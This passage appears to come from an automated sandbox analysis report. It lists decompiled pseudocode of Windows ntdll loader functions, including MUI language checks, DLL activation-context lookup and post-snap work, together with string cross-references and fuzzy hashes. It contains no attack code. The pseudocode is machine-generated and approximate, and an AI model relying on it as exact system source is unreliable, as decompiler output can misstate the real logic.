                                                                      					_v8 = _t280;
                                                                      				}
                                                                      				if(E011E1B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
                                                                      					_v60 =  *_v8;
                                                                      					L011F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
                                                                      					_v8 = _t280;
                                                                      				}
                                                                      				if(E011E1B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
                                                                      					L16:
                                                                      					if(E011E1B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
                                                                      						L28:
                                                                      						if(E011E1B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
                                                                      							L46:
                                                                      							_t275 = _v16;
                                                                      							L47:
                                                                      							_t161 = 0;
                                                                      							L48:
                                                                      							if(_v8 != 0) {
                                                                      								L011F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
                                                                      							}
                                                                      							_t140 = _v20;
                                                                      							if(_t140 != 0) {
                                                                      								if(_t275 != 0) {
                                                                      									L011F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
                                                                      									_t275 = 0;
                                                                      									_v28 = 0;
                                                                      									_t140 = _v20;
                                                                      								}
                                                                      							}
                                                                      							goto L50;
                                                                      						}
                                                                      						_t167 = _v12;
                                                                      						_t255 = _v12 + 4;
                                                                      						_v44 = _t255;
                                                                      						if(_t255 == 0) {
                                                                      							_t276 = _t280;
                                                                      							_v32 = _t280;
                                                                      						} else {
                                                                      							_t276 = L011F4620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
                                                                      							_t167 = _v12;
                                                                      							_v32 = _t276;
                                                                      						}
                                                                      						if(_t276 == 0) {
                                                                      							_v44 = _t280;
                                                                      							_t280 = 0xc0000017;
                                                                      							goto L46;
                                                                      						} else {
                                                                      							E0121F3E0(_t276, _v8, _t167);
                                                                      							_v48 = _t276;
                                                                      							_t277 = E01221370(_t276, 0x11b4e90);
                                                                      							_pop(_t257);
                                                                      							if(_t277 == 0) {
                                                                      								L38:
                                                                      								_t170 = _v48;
                                                                      								if( *_v48 != 0) {
                                                                      									E0121BB40(0,  &_v68, _t170);
                                                                      									if(L011E43C0( &_v68,  &_v24) != 0) {
                                                                      										_t280 =  &(_t280[0]);
                                                                      									}
                                                                      								}
                                                                      								if(_t280 == 0) {
                                                                      									_t280 = 0;
                                                                      									L011F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
                                                                      									_v44 = 0;
                                                                      									_v32 = 0;
                                                                      								} else {
                                                                      									_t280 = 0;
                                                                      								}
                                                                      								_t174 = _v8;
                                                                      								if(_v8 != 0) {
                                                                      									L011F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
                                                                      								}
                                                                      								_v8 = _t280;
                                                                      								goto L46;
                                                                      							}
                                                                      							_t243 = _v48;
                                                                      							do {
                                                                      								 *_t277 = 0;
                                                                      								_t278 = _t277 + 2;
                                                                      								E0121BB40(_t257,  &_v68, _t243);
                                                                      								if(L011E43C0( &_v68,  &_v24) != 0) {
                                                                      									_t280 =  &(_t280[0]);
                                                                      								}
                                                                      								_t243 = _t278;
                                                                      								_t277 = E01221370(_t278, 0x11b4e90);
                                                                      								_pop(_t257);
                                                                      							} while (_t277 != 0);
                                                                      							_v48 = _t243;
                                                                      							_t242 = _v52;
                                                                      							goto L38;
                                                                      						}
                                                                      					}
                                                                      					_t191 = _v12;
                                                                      					_t260 = _v12 + 4;
                                                                      					_v28 = _t260;
                                                                      					if(_t260 == 0) {
                                                                      						_t275 = _t280;
                                                                      						_v16 = _t280;
                                                                      					} else {
                                                                      						_t275 = L011F4620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
                                                                      						_t191 = _v12;
                                                                      						_v16 = _t275;
                                                                      					}
                                                                      					if(_t275 == 0) {
                                                                      						_v28 = _t280;
                                                                      						_t280 = 0xc0000017;
                                                                      						goto L47;
                                                                      					} else {
                                                                      						E0121F3E0(_t275, _v8, _t191);
                                                                      						_t285 = _t285 + 0xc;
                                                                      						_v48 = _t275;
                                                                      						_t279 = _t280;
                                                                      						_t281 = E01221370(_v16, 0x11b4e90);
                                                                      						_pop(_t262);
                                                                      						if(_t281 != 0) {
                                                                      							_t244 = _v48;
                                                                      							do {
                                                                      								 *_t281 = 0;
                                                                      								_t282 = _t281 + 2;
                                                                      								E0121BB40(_t262,  &_v68, _t244);
                                                                      								if(L011E43C0( &_v68,  &_v24) != 0) {
                                                                      									_t279 =  &(_t279[0]);
                                                                      								}
                                                                      								_t244 = _t282;
                                                                      								_t281 = E01221370(_t282, 0x11b4e90);
                                                                      								_pop(_t262);
                                                                      							} while (_t281 != 0);
                                                                      							_v48 = _t244;
                                                                      							_t242 = _v52;
                                                                      						}
                                                                      						_t201 = _v48;
                                                                      						_t280 = 0;
                                                                      						if( *_v48 != 0) {
                                                                      							E0121BB40(_t262,  &_v68, _t201);
                                                                      							if(L011E43C0( &_v68,  &_v24) != 0) {
                                                                      								_t279 =  &(_t279[0]);
                                                                      							}
                                                                      						}
                                                                      						if(_t279 == 0) {
                                                                      							L011F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
                                                                      							_v28 = _t280;
                                                                      							_v16 = _t280;
                                                                      						}
                                                                      						_t202 = _v8;
                                                                      						if(_v8 != 0) {
                                                                      							L011F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
                                                                      						}
                                                                      						_v8 = _t280;
                                                                      						goto L28;
                                                                      					}
                                                                      				}
                                                                      				_t214 = _v12;
                                                                      				_t264 = _v12 + 4;
                                                                      				_v40 = _t264;
                                                                      				if(_t264 == 0) {
                                                                      					_v20 = _t280;
                                                                      				} else {
                                                                      					_t236 = L011F4620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
                                                                      					_t280 = _t236;
                                                                      					_v20 = _t236;
                                                                      					_t214 = _v12;
                                                                      				}
                                                                      				if(_t280 == 0) {
                                                                      					_t161 = 0;
                                                                      					_t280 = 0xc0000017;
                                                                      					_v40 = 0;
                                                                      					goto L48;
                                                                      				} else {
                                                                      					E0121F3E0(_t280, _v8, _t214);
                                                                      					_t285 = _t285 + 0xc;
                                                                      					_v48 = _t280;
                                                                      					_t283 = E01221370(_t280, 0x11b4e90);
                                                                      					_pop(_t267);
                                                                      					if(_t283 != 0) {
                                                                      						_t245 = _v48;
                                                                      						do {
                                                                      							 *_t283 = 0;
                                                                      							_t284 = _t283 + 2;
                                                                      							E0121BB40(_t267,  &_v68, _t245);
                                                                      							if(L011E43C0( &_v68,  &_v24) != 0) {
                                                                      								_t275 = _t275 + 1;
                                                                      							}
                                                                      							_t245 = _t284;
                                                                      							_t283 = E01221370(_t284, 0x11b4e90);
                                                                      							_pop(_t267);
                                                                      						} while (_t283 != 0);
                                                                      						_v48 = _t245;
                                                                      						_t242 = _v52;
                                                                      					}
                                                                      					_t224 = _v48;
                                                                      					_t280 = 0;
                                                                      					if( *_v48 != 0) {
                                                                      						E0121BB40(_t267,  &_v68, _t224);
                                                                      						if(L011E43C0( &_v68,  &_v24) != 0) {
                                                                      							_t275 = _t275 + 1;
                                                                      						}
                                                                      					}
                                                                      					if(_t275 == 0) {
                                                                      						L011F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
                                                                      						_v40 = _t280;
                                                                      						_v20 = _t280;
                                                                      					}
                                                                      					_t225 = _v8;
                                                                      					if(_v8 != 0) {
                                                                      						L011F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
                                                                      					}
                                                                      					_v8 = _t280;
                                                                      					goto L16;
                                                                      				}
                                                                      			}

                                                                      Strings
                                                                      • Kernel-MUI-Language-SKU, xrefs: 011E3F70
                                                                      • Kernel-MUI-Language-Disallowed, xrefs: 011E3E97
                                                                      • Kernel-MUI-Language-Allowed, xrefs: 011E3DC0
                                                                      • Kernel-MUI-Number-Allowed, xrefs: 011E3D8C
                                                                      • WindowsExcludedProcs, xrefs: 011E3D6F
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.477021051.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                      • API String ID: 0-258546922
                                                                      • Opcode ID: 729dd1bd07d298ab3931279ab870b506761bd9a1da91313d0afe1aa8ac44f1bd
                                                                      • Instruction ID: b9ec8a02926faef518cbff5e21ef0a828689c902b06e702b95723639b88b01ce
                                                                      • Opcode Fuzzy Hash: 729dd1bd07d298ab3931279ab870b506761bd9a1da91313d0afe1aa8ac44f1bd
                                                                      • Instruction Fuzzy Hash: 8AF16C72D10619EBCB19DFD8C984AEEBBF9FF58650F15016AE905E7610E7309E01CBA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 44%
                                                                      			E01208E00(void* __ecx) {
                                                                      				signed int _v8;
                                                                      				char _v12;
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				void* __esi;
                                                                      				intOrPtr* _t32;
                                                                      				intOrPtr _t35;
                                                                      				intOrPtr _t43;
                                                                      				void* _t46;
                                                                      				intOrPtr _t47;
                                                                      				void* _t48;
                                                                      				signed int _t49;
                                                                      				void* _t50;
                                                                      				intOrPtr* _t51;
                                                                      				signed int _t52;
                                                                      				void* _t53;
                                                                      				intOrPtr _t55;
                                                                      
                                                                      				_v8 =  *0x12cd360 ^ _t52;
                                                                      				_t49 = 0;
                                                                      				_t48 = __ecx;
                                                                      				_t55 =  *0x12c8464; // 0x74790110
                                                                      				if(_t55 == 0) {
                                                                      					L9:
                                                                      					if( !_t49 >= 0) {
                                                                      						if(( *0x12c5780 & 0x00000003) != 0) {
                                                                      							E01255510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
                                                                      						}
                                                                      						if(( *0x12c5780 & 0x00000010) != 0) {
                                                                      							asm("int3");
                                                                      						}
                                                                      					}
                                                                      					return E0121B640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
                                                                      				}
                                                                      				_t47 =  *((intOrPtr*)(__ecx + 0x18));
                                                                      				_t43 =  *0x12c7984; // 0xc92ba8
                                                                      				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
                                                                      					_t32 =  *((intOrPtr*)(_t48 + 0x28));
                                                                      					if(_t48 == _t43) {
                                                                      						_t50 = 0x5c;
                                                                      						if( *_t32 == _t50) {
                                                                      							_t46 = 0x3f;
                                                                      							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
                                                                      								_t32 = _t32 + 8;
                                                                      							}
                                                                      						}
                                                                      					}
                                                                      					_t51 =  *0x12c8464; // 0x74790110
                                                                      					 *0x12cb1e0(_t47, _t32,  &_v12);
                                                                      					_t49 =  *_t51();
                                                                      					if(_t49 >= 0) {
                                                                      						L8:
                                                                      						_t35 = _v12;
                                                                      						if(_t35 != 0) {
                                                                      							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
                                                                      								E01209B10( *((intOrPtr*)(_t48 + 0x48)));
                                                                      								_t35 = _v12;
                                                                      							}
                                                                      							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
                                                                      						}
                                                                      						goto L9;
                                                                      					}
                                                                      					if(_t49 != 0xc000008a) {
                                                                      						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
                                                                      							if(_t49 != 0xc00000bb) {
                                                                      								goto L8;
                                                                      							}
                                                                      						}
                                                                      					}
                                                                      					if(( *0x12c5780 & 0x00000005) != 0) {
                                                                      						_push(_t49);
                                                                      						E01255510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
                                                                      						_t53 = _t53 + 0x1c;
                                                                      					}
                                                                      					_t49 = 0;
                                                                      					goto L8;
                                                                      				} else {
                                                                      					goto L9;
                                                                      				}
                                                                      			}

                                                                      Strings
                                                                      • minkernel\ntdll\ldrsnap.c, xrefs: 0124933B, 01249367
                                                                      • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 0124932A
                                                                      • Querying the active activation context failed with status 0x%08lx, xrefs: 01249357
                                                                      • LdrpFindDllActivationContext, xrefs: 01249331, 0124935D
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.477021051.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                                      • API String ID: 0-3779518884
                                                                      • Opcode ID: 6fc59d8b3b49c4807a45e78a078d0b797291cca0ed8ba7b8df0a9ff922f278dc
                                                                      • Instruction ID: b4f6ea182deca743889ce0fb1bf727a78d745e9dd34601be201cc62f3228a971
                                                                      • Opcode Fuzzy Hash: 6fc59d8b3b49c4807a45e78a078d0b797291cca0ed8ba7b8df0a9ff922f278dc
                                                                      • Instruction Fuzzy Hash: 7341C821E203169FDB37AB1C988DB77BAA5AB09254F054369FB04571D3E7B0AD808781
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 83%
                                                                      			E011E8794(void* __ecx) {
                                                                      				signed int _v0;
                                                                      				char _v8;
                                                                      				signed int _v12;
                                                                      				void* _v16;
                                                                      				signed int _v20;
                                                                      				intOrPtr _v24;
                                                                      				signed int _v28;
                                                                      				signed int _v32;
                                                                      				signed int _v40;
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				void* __esi;
                                                                      				void* __ebp;
                                                                      				intOrPtr* _t77;
                                                                      				signed int _t80;
                                                                      				signed char _t81;
                                                                      				signed int _t87;
                                                                      				signed int _t91;
                                                                      				void* _t92;
                                                                      				void* _t94;
                                                                      				signed int _t95;
                                                                      				signed int _t103;
                                                                      				signed int _t105;
                                                                      				signed int _t110;
                                                                      				signed int _t118;
                                                                      				intOrPtr* _t121;
                                                                      				intOrPtr _t122;
                                                                      				signed int _t125;
                                                                      				signed int _t129;
                                                                      				signed int _t131;
                                                                      				signed int _t134;
                                                                      				signed int _t136;
                                                                      				signed int _t143;
                                                                      				signed int* _t147;
                                                                      				signed int _t151;
                                                                      				void* _t153;
                                                                      				signed int* _t157;
                                                                      				signed int _t159;
                                                                      				signed int _t161;
                                                                      				signed int _t166;
                                                                      				signed int _t168;
                                                                      
                                                                      				_push(__ecx);
                                                                      				_t153 = __ecx;
                                                                      				_t159 = 0;
                                                                      				_t121 = __ecx + 0x3c;
                                                                      				if( *_t121 == 0) {
                                                                      					L2:
                                                                      					_t77 =  *((intOrPtr*)(_t153 + 0x58));
                                                                      					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
                                                                      						_t122 =  *((intOrPtr*)(_t153 + 0x20));
                                                                      						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
                                                                      						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
                                                                      							L6:
                                                                      							if(E011E934A() != 0) {
                                                                      								_t159 = E0125A9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
                                                                      								__eflags = _t159;
                                                                      								if(_t159 < 0) {
                                                                      									_t81 =  *0x12c5780; // 0x0
                                                                      									__eflags = _t81 & 0x00000003;
                                                                      									if((_t81 & 0x00000003) != 0) {
                                                                      										_push(_t159);
                                                                      										E01255510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
                                                                      										_t81 =  *0x12c5780; // 0x0
                                                                      									}
                                                                      									__eflags = _t81 & 0x00000010;
                                                                      									if((_t81 & 0x00000010) != 0) {
                                                                      										asm("int3");
                                                                      									}
                                                                      								}
                                                                      							}
                                                                      						} else {
                                                                      							_t159 = E011E849B(0, _t122, _t153, _t159, _t180);
                                                                      							if(_t159 >= 0) {
                                                                      								goto L6;
                                                                      							}
                                                                      						}
                                                                      						_t80 = _t159;
                                                                      						goto L8;
                                                                      					} else {
                                                                      						_t125 = 0x13;
                                                                      						asm("int 0x29");
                                                                      						_push(0);
                                                                      						_push(_t159);
                                                                      						_t161 = _t125;
                                                                      						_t87 =  *( *[fs:0x30] + 0x1e8);
                                                                      						_t143 = 0;
                                                                      						_v40 = _t161;
                                                                      						_t118 = 0;
                                                                      						_push(_t153);
                                                                      						__eflags = _t87;
                                                                      						if(_t87 != 0) {
                                                                      							_t118 = _t87 + 0x5d8;
                                                                      							__eflags = _t118;
                                                                      							if(_t118 == 0) {
                                                                      								L46:
                                                                      								_t118 = 0;
                                                                      							} else {
                                                                      								__eflags =  *(_t118 + 0x30);
                                                                      								if( *(_t118 + 0x30) == 0) {
                                                                      									goto L46;
                                                                      								}
                                                                      							}
                                                                      						}
                                                                      						_v32 = 0;
                                                                      						_v28 = 0;
                                                                      						_v16 = 0;
                                                                      						_v20 = 0;
                                                                      						_v12 = 0;
                                                                      						__eflags = _t118;
                                                                      						if(_t118 != 0) {
                                                                      							__eflags = _t161;
                                                                      							if(_t161 != 0) {
                                                                      								__eflags =  *(_t118 + 8);
                                                                      								if( *(_t118 + 8) == 0) {
                                                                      									L22:
                                                                      									_t143 = 1;
                                                                      									__eflags = 1;
                                                                      								} else {
                                                                      									_t19 = _t118 + 0x40; // 0x40
                                                                      									_t156 = _t19;
                                                                      									E011E8999(_t19,  &_v16);
                                                                      									__eflags = _v0;
                                                                      									if(_v0 != 0) {
                                                                      										__eflags = _v0 - 1;
                                                                      										if(_v0 != 1) {
                                                                      											goto L22;
                                                                      										} else {
                                                                      											_t128 =  *(_t161 + 0x64);
                                                                      											__eflags =  *(_t161 + 0x64);
                                                                      											if( *(_t161 + 0x64) == 0) {
                                                                      												goto L22;
                                                                      											} else {
                                                                      												E011E8999(_t128,  &_v12);
                                                                      												_t147 = _v12;
                                                                      												_t91 = 0;
                                                                      												__eflags = 0;
                                                                      												_t129 =  *_t147;
                                                                      												while(1) {
                                                                      													__eflags =  *((intOrPtr*)(0x12c5c60 + _t91 * 8)) - _t129;
                                                                      													if( *((intOrPtr*)(0x12c5c60 + _t91 * 8)) == _t129) {
                                                                      														break;
                                                                      													}
                                                                      													_t91 = _t91 + 1;
                                                                      													__eflags = _t91 - 5;
                                                                      													if(_t91 < 5) {
                                                                      														continue;
                                                                      													} else {
                                                                      														_t131 = 0;
                                                                      														__eflags = 0;
                                                                      													}
                                                                      													L37:
                                                                      													__eflags = _t131;
                                                                      													if(_t131 != 0) {
                                                                      														goto L22;
                                                                      													} else {
                                                                      														__eflags = _v16 - _t147;
                                                                      														if(_v16 != _t147) {
                                                                      															goto L22;
                                                                      														} else {
                                                                      															E011F2280(_t92, 0x12c86cc);
                                                                      															_t94 = E012A9DFB( &_v20);
                                                                      															__eflags = _t94 - 1;
                                                                      															if(_t94 != 1) {
                                                                      															}
                                                                      															asm("movsd");
                                                                      															asm("movsd");
                                                                      															asm("movsd");
                                                                      															asm("movsd");
                                                                      															 *_t118 =  *_t118 + 1;
                                                                      															asm("adc dword [ebx+0x4], 0x0");
                                                                      															_t95 = E012061A0( &_v32);
                                                                      															__eflags = _t95;
                                                                      															if(_t95 != 0) {
                                                                      																__eflags = _v32 | _v28;
                                                                      																if((_v32 | _v28) != 0) {
                                                                      																	_t71 = _t118 + 0x40; // 0x3f
                                                                      																	_t134 = _t71;
                                                                      																	goto L55;
                                                                      																}
                                                                      															}
                                                                      															goto L30;
                                                                      														}
                                                                      													}
                                                                      													goto L56;
                                                                      												}
                                                                      												_t92 = 0x12c5c64 + _t91 * 8;
                                                                      												asm("lock xadd [eax], ecx");
                                                                      												_t131 = (_t129 | 0xffffffff) - 1;
                                                                      												goto L37;
                                                                      											}
                                                                      										}
                                                                      										goto L56;
                                                                      									} else {
                                                                      										_t143 = E011E8A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
                                                                      										__eflags = _t143;
                                                                      										if(_t143 != 0) {
                                                                      											_t157 = _v12;
                                                                      											_t103 = 0;
                                                                      											__eflags = 0;
                                                                      											_t136 =  &(_t157[1]);
                                                                      											 *(_t161 + 0x64) = _t136;
                                                                      											_t151 =  *_t157;
                                                                      											_v20 = _t136;
                                                                      											while(1) {
                                                                      												__eflags =  *((intOrPtr*)(0x12c5c60 + _t103 * 8)) - _t151;
                                                                      												if( *((intOrPtr*)(0x12c5c60 + _t103 * 8)) == _t151) {
                                                                      													break;
                                                                      												}
                                                                      												_t103 = _t103 + 1;
                                                                      												__eflags = _t103 - 5;
                                                                      												if(_t103 < 5) {
                                                                      													continue;
                                                                      												}
                                                                      												L21:
                                                                      												_t105 = E0121F380(_t136, 0x11b1184, 0x10);
                                                                      												__eflags = _t105;
                                                                      												if(_t105 != 0) {
                                                                      													__eflags =  *_t157 -  *_v16;
                                                                      													if( *_t157 >=  *_v16) {
                                                                      														goto L22;
                                                                      													} else {
                                                                      														asm("cdq");
                                                                      														_t166 = _t157[5] & 0x0000ffff;
                                                                      														_t108 = _t157[5] & 0x0000ffff;
                                                                      														asm("cdq");
                                                                      														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
                                                                      														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
                                                                      														if(__eflags > 0) {
                                                                      															L29:
                                                                      															E011F2280(_t108, 0x12c86cc);
                                                                      															 *_t118 =  *_t118 + 1;
                                                                      															_t42 = _t118 + 0x40; // 0x3f
                                                                      															_t156 = _t42;
                                                                      															asm("adc dword [ebx+0x4], 0x0");
                                                                      															asm("movsd");
                                                                      															asm("movsd");
                                                                      															asm("movsd");
                                                                      															asm("movsd");
                                                                      															_t110 = E012061A0( &_v32);
                                                                      															__eflags = _t110;
                                                                      															if(_t110 != 0) {
                                                                      																__eflags = _v32 | _v28;
                                                                      																if((_v32 | _v28) != 0) {
                                                                      																	_t134 = _v20;
                                                                      																	L55:
                                                                      																	E012A9D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
                                                                      																}
                                                                      															}
                                                                      															L30:
                                                                      															 *_t118 =  *_t118 + 1;
                                                                      															asm("adc dword [ebx+0x4], 0x0");
                                                                      															E011EFFB0(_t118, _t156, 0x12c86cc);
                                                                      															goto L22;
                                                                      														} else {
                                                                      															if(__eflags < 0) {
                                                                      																goto L22;
                                                                      															} else {
                                                                      																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
                                                                      																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
                                                                      																	goto L22;
                                                                      																} else {
                                                                      																	goto L29;
                                                                      																}
                                                                      															}
                                                                      														}
                                                                      													}
                                                                      													goto L56;
                                                                      												}
                                                                      												goto L22;
                                                                      											}
                                                                      											asm("lock inc dword [eax]");
                                                                      											goto L21;
                                                                      										}
                                                                      									}
                                                                      								}
                                                                      							}
                                                                      						}
                                                                      						return _t143;
                                                                      					}
                                                                      				} else {
                                                                      					_push( &_v8);
                                                                      					_push( *((intOrPtr*)(__ecx + 0x50)));
                                                                      					_push(__ecx + 0x40);
                                                                      					_push(_t121);
                                                                      					_push(0xffffffff);
                                                                      					_t80 = E01219A00();
                                                                      					_t159 = _t80;
                                                                      					if(_t159 < 0) {
                                                                      						L8:
                                                                      						return _t80;
                                                                      					} else {
                                                                      						goto L2;
                                                                      					}
                                                                      				}
                                                                      				L56:
                                                                      			}

                                                                      Instruction addresses (one per pseudocode line in the original report; the side-by-side alignment with the listing above was lost in extraction): the function body lies in 0x011e8799 to 0x011e8996, with out-of-line blocks at 0x01239bfe to 0x01239cc0. Entries of 0x00000000 stand for pseudocode lines (gotos, braces, else branches) that carry no instruction address of their own.

                                                                      Strings
                                                                      • LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 01239C18
                                                                      • minkernel\ntdll\ldrsnap.c, xrefs: 01239C28
                                                                      • LdrpDoPostSnapWork, xrefs: 01239C1E
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.477021051.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: true
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
                                                                      • API String ID: 2994545307-1948996284
                                                                      • Opcode ID: 0d0c5be525874d690216c367163dafd8ccbc4403de5246a65aa4c4ca0b08e2f7
                                                                      • Instruction ID: 821edf20ce3074a4b10890345b7897b0ac79bde1c73e26c8d7f93be613676322
                                                                      • Opcode Fuzzy Hash: 0d0c5be525874d690216c367163dafd8ccbc4403de5246a65aa4c4ca0b08e2f7
                                                                      • Instruction Fuzzy Hash: D7911271A10A069FEF1CDF99D488ABAB7F5FF85314B054169EE01AB240EB70ED41CB90
                                                                      Uniqueness
                                                                      • Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 98%
                                                                      			E011E7E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                                                                      				char _v8;
                                                                      				intOrPtr _v12;
                                                                      				intOrPtr _v16;
                                                                      				intOrPtr _v20;
                                                                      				char _v24;
                                                                      				signed int _t73;
                                                                      				void* _t77;
                                                                      				char* _t82;
                                                                      				char* _t87;
                                                                      				signed char* _t97;
                                                                      				signed char _t102;
                                                                      				intOrPtr _t107;
                                                                      				signed char* _t108;
                                                                      				intOrPtr _t112;
                                                                      				intOrPtr _t124;
                                                                      				intOrPtr _t125;
                                                                      				intOrPtr _t126;
                                                                      
                                                                      				_t107 = __edx;
                                                                      				_v12 = __ecx;
                                                                      				_t125 =  *((intOrPtr*)(__ecx + 0x20));
                                                                      				_t124 = 0;
                                                                      				_v20 = __edx;
                                                                      				if(E011ECEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
                                                                      					_t112 = _v8;
                                                                      				} else {
                                                                      					_t112 = 0;
                                                                      					_v8 = 0;
                                                                      				}
                                                                      				if(_t112 != 0) {
                                                                      					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
                                                                      						_t124 = 0xc000007b;
                                                                      						goto L8;
                                                                      					}
                                                                      					_t73 =  *(_t125 + 0x34) | 0x00400000;
                                                                      					 *(_t125 + 0x34) = _t73;
                                                                      					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
                                                                      						goto L3;
                                                                      					}
                                                                      					 *(_t125 + 0x34) = _t73 | 0x01000000;
                                                                      					_t124 = E011DC9A4( *((intOrPtr*)(_t125 + 0x18)));
                                                                      					if(_t124 < 0) {
                                                                      						goto L8;
                                                                      					} else {
                                                                      						goto L3;
                                                                      					}
                                                                      				} else {
                                                                      					L3:
                                                                      					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
                                                                      						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
                                                                      						L8:
                                                                      						return _t124;
                                                                      					}
                                                                      					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
                                                                      						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
                                                                      							goto L5;
                                                                      						}
                                                                      						_t102 =  *0x12c5780; // 0x0
                                                                      						if((_t102 & 0x00000003) != 0) {
                                                                      							E01255510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
                                                                      							_t102 =  *0x12c5780; // 0x0
                                                                      						}
                                                                      						if((_t102 & 0x00000010) != 0) {
                                                                      							asm("int3");
                                                                      						}
                                                                      						_t124 = 0xc0000428;
                                                                      						goto L8;
                                                                      					}
                                                                      					L5:
                                                                      					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
                                                                      						goto L8;
                                                                      					}
                                                                      					_t77 = _a4 - 0x40000003;
                                                                      					if(_t77 == 0 || _t77 == 0x33) {
                                                                      						_v16 =  *((intOrPtr*)(_t125 + 0x18));
                                                                      						if(E011F7D50() != 0) {
                                                                      							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                                      						} else {
                                                                      							_t82 = 0x7ffe0384;
                                                                      						}
                                                                      						_t108 = 0x7ffe0385;
                                                                      						if( *_t82 != 0) {
                                                                      							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
                                                                      								if(E011F7D50() == 0) {
                                                                      									_t97 = 0x7ffe0385;
                                                                      								} else {
